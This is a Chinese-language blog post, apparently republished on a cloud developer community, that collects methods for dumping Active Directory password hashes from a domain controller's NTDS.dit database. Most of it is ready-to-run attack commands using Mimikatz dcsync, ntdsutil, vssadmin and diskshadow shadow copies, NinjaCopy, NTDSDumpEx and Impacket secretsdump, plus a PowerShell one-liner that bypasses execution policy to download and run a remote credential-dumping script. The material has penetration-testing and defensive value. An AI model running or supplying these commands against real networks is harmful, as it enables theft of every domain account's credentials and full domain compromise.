前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >域渗透之导出域Hash

域渗透之导出域Hash

作者头像
全栈程序员站长
发布于 2022-07-13 11:59:58
发布于 2022-07-13 11:59:58
1.3K00
代码可运行
举报
运行总次数:0
代码可运行

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之导出域Hash

前言

网上采集了一些域内导出NTDS.dit文件的方式

Hash 值存储在域控制器中(C:\Windows\NTDS\NTDS.DIT)

Mimikatz

Mimikatz有一个功能(dcsync),它利用目录复制服务(DRS)从 NTDS.DIT 文件中检索密码 Hash 值。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit > hash.txt  //所有用户 
Mimikatz "lsadump::dcsync /domain:test.com /user:username" exit > hash.txt   //# 指定用户     

Ntdsutil

Ntdsutil 域控制器默认安装,使管理员能访问和管理 Windows Active Directory 数据库渗透测试中可以用它来拍摄 ntds.dit 文件的快照

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
GUID{aa488f5b-40c7-4044-b24f-16fd041a6de2}

# 挂载快照
ntdsutil snapshot "mount GUID" quit quit

# 复制 ntds.dit
copy C:\$SNAP_201908200435_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

# 卸载快照
ntdsutil snapshot "unmount GUID" quit quit

# 删除快照
ntdsutil snapshot "delete GUID" quit quit

# 查询快照
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit

Vssadmin

域控制器默认安装

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 查询当前系统的快照
vssadmin list shadows

# 创建快照
vssadmin create shadow /for=c: /autoretry=10
"Shadow Copy Volume Name" 为 \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
"Shadow Copy ID"{aa488f5b-40c7-4044-b24f-16fd041a6de2}

# 复制 ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\ntds.dit

# 删除快照
vssadmin delete shadows /for=c: /quiet

Diskshadow

DiskShadow 是由微软官方签名的,Windows Server 2008、2012、2016 都包含了 DiskShadow,所在目录C:\windows\system32\diskshadow.exe。包含交互式命令和脚本模式。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 查看存放 `ntds.dit` 的逻辑驱动器(一般为 C 盘)
# 找出系统没有使用的逻辑驱动器号
wmic logicaldisk

# 调用脚本
C:\windows\system32\diskshadow.exe /s C:\shadow.txt

​ shadow.txt 内容

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "C:\windows\system32\cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\ntds.dit
delete shadows volume %someAlias%
reset

Powershell

项目地址:https://github.com/EmpireProject/Empire

# 远程加载 Invoke-DCSync.ps1

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 远程加载 Invoke-DCSync.ps1
powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt

通过NinjaCopy获得域控服务器NTDS.dit文件

ninjacopy下载地址:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Import-Module -name .\Invoke-NinjaCopy.ps1 Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\ntds.dit" Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"     

ntds.dit 提取 Hash

NTDSDumpEx

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 离线模式:先导出注册表
reg save hklm\system system.hiv 
NTDSDumpEx.exe -d ntds.dit -s system.hiv -o hash.txt              

# 在线模式:无需导出注册表 
NTDSDumpEx.exe -d ntds.dit -r -o hash.txt            

Impacket

项目地址:https://github.com/SecureAuthCorp/impacket

因为 Kali 的 python 环境安装得比较全,所以使用 Kali 来解 Hash

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python secretsdump.py -ntds /home/workspace/hash/ntds.dit -system /home/workspace/hash/sys.hiv LOCAL > /home/workspace/hash/hash.txt

使用 Ntdsutil、Vssadmin 等卷影拷贝工具时,需要先开启 Volume Shadow Copy Service 服务

参考

[域渗透]导出域用户Hash方法总结

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/119832.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021年12月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
导出域内用户hash的几种方法
在渗透测试期间,可以利用域管权限对域内用户hash进行导出和破解。这些域内用户hash存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如组成员身份和用户。
Jumbo
2018/07/26
5.1K0
导出域内用户hash的几种方法
域控安全之ntds.dit导出
在通常的情况下,即使我们拥有域管理员的权限也是无法读取域控制器的C:\Windows\NTDS\ntds.dit文件,是因为活动目录始终访问着这个文件,所以禁止读取.使用windows的本地卷影拷贝就可以获得文件的副本
亿人安全
2023/02/28
2.1K0
域控安全之ntds.dit导出
抓取域密码哈希的各种工具集合
在拿到域管理员权限之后,都会提取所有域用户的密码哈希进行离线破解和分析。这些密码哈希存储在域控制器(NTDS.DIT)中的数据库文件中,并包含一些附加信息,如组成员和用户。
信安之路
2021/07/29
2.3K0
内网渗透基石篇之域控制器
在通常情况下,即使拥有管理员权限,也无法读取域控制器中的ndts.dit文件,但是我们又非常想获得这个文件的内容,这个时候就需要使用windows本地卷影拷贝服务VSS。在活动目录中,所有的数据都保存在ntds.dit文件中,ntds.dit是一个二进制文件,包含用户名、散列值、组、GPP、OU等与活动目录相关的信息,它和SAM文件一样,被windows系统锁死。卷影拷贝服务VSS,本质上属于快照技术的一种,主要用于备份和恢复,即使文件当前处于锁死状态。
FB客服
2021/08/24
1.1K0
转储域密码哈希值
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
安恒网络空间安全讲武堂
2019/09/19
1.1K0
转储域密码哈希值
内网学习笔记 | 密码抓取
Windows 系统一般使用两种方法对用户的密码进行加密处理,在域环境中,用户的密码信息以哈希值的密文形式存储在 ntds.dit 二进制文件中,该文件位于 %SystemRoot%\ntds\ntds.dit 路径下,由于该文件一直被活动目录访问,因此这个文件是被系统禁止读取的。
TeamsSix
2022/09/20
2.3K0
内网学习笔记 | 密码抓取
使用卷影拷贝服务提取 ntds.dit 的多种姿势
Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
渗透攻击红队
2020/11/25
3.2K0
使用卷影拷贝服务提取 ntds.dit 的多种姿势
AD攻防-域用户HashDump追踪之道
Know it Then Hack it,网上dump域用户hash的方式五花八门,少有站在防御者视角对不同的dump方式进行梳理剖析和取证定位的文章,掌握不同dump方式的底层原理才能在EDR对抗时不慌不乱、在应急响应中抓住重点,选择最适合的手段快速达到自己的目的。本文大纲如下:
亿人安全
2023/09/15
6390
AD攻防-域用户HashDump追踪之道
内网渗透测试研究:从NTDS.dit获取域散列值
本文我们将演示如何获取域控制器上的Ntds.dit文件并提取其中的域账户和密码哈希。
FB客服
2020/10/27
3.2K0
内网渗透测试研究:从NTDS.dit获取域散列值
域控制器安全
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是域控制器安全,介绍了使用Kerberos域用户提权和导出ntds.dit中散列值的方法,并针对域控制器攻击提出了有效的安全建议
红客突击队
2022/09/29
7430
利用卷影拷贝服务攻击域控五大绝招
在微软Active Directory(活动目录)中,所有的数据都被保存在ntds.dit中, NTDS.DIT是一个二进制文件,
Ms08067安全实验室
2023/11/03
6460
利用卷影拷贝服务攻击域控五大绝招
内网渗透-导出HASH的多种方式
在内网渗透中当我们得到一台高权限用户的身份时,就可以抓取到当前机器上的各类密码。虽然任务要求是导出域hash的方式,但在内网渗透中,获取当前机器的hash也有可能获取到域用户的hash,因此这里也分析一下如何获取当前机器的明文密码。
亿人安全
2024/08/13
4620
内网渗透-导出HASH的多种方式
利用卷影拷贝服务提取ntds.dit
本文由团队成员编写,首发于先知社区:https://xz.aliyun.com/t/9624
红队蓝军
2022/02/05
9480
利用卷影拷贝服务提取ntds.dit
内网渗透 | 利用拷贝卷影提取ntds.dit
通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。那么什么是ntds.dit呢?
HACK学习
2021/06/24
1.6K0
内网渗透 | 利用拷贝卷影提取ntds.dit
利用卷影拷贝服务提取ntds.dit
通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。那么什么是ntds.dit呢?
红队蓝军
2022/05/17
1.2K0
利用卷影拷贝服务提取ntds.dit
内网渗透之各种密码凭证窃取 - 渗透红队笔记
lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略zhi。
渗透攻击红队
2020/11/25
2.8K0
内网渗透之各种密码凭证窃取 - 渗透红队笔记
基于AD Event日志检测NTDS凭据转储攻击
在域环境里,域内用户hash存储在域控制器(ntds.dit)中的数据库文件中,ntds.dit文件是无法直接被复制的。在这种情况下,我们一般可以利用卷影复制服务(VSS)来实现ntds.dit的拷贝,然后下载进行离线分析和破解用户哈希。
Bypass
2022/12/01
5970
利用ProxyShell漏洞获取域控所有Hash
CVE-2021-34523:在 Exchange PowerShell 后台的提权漏洞
小生观察室
2021/09/04
1.7K0
利用ProxyShell漏洞获取域控所有Hash
什么是渗透_mitotracker deep red
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
全栈程序员站长
2022/09/20
6630
什么是渗透_mitotracker deep red
我所了解的内网渗透 - 内网渗透知识大总结
一般想知道哪一台是域控知道自己内网的DNS就可以了,一般域控安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用NLTEST命令查看。最后就是各种网络查看查看域控是哪台主机
HACK学习
2019/08/06
4.3K0
我所了解的内网渗透 - 内网渗透知识大总结
相关推荐
导出域内用户hash的几种方法
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文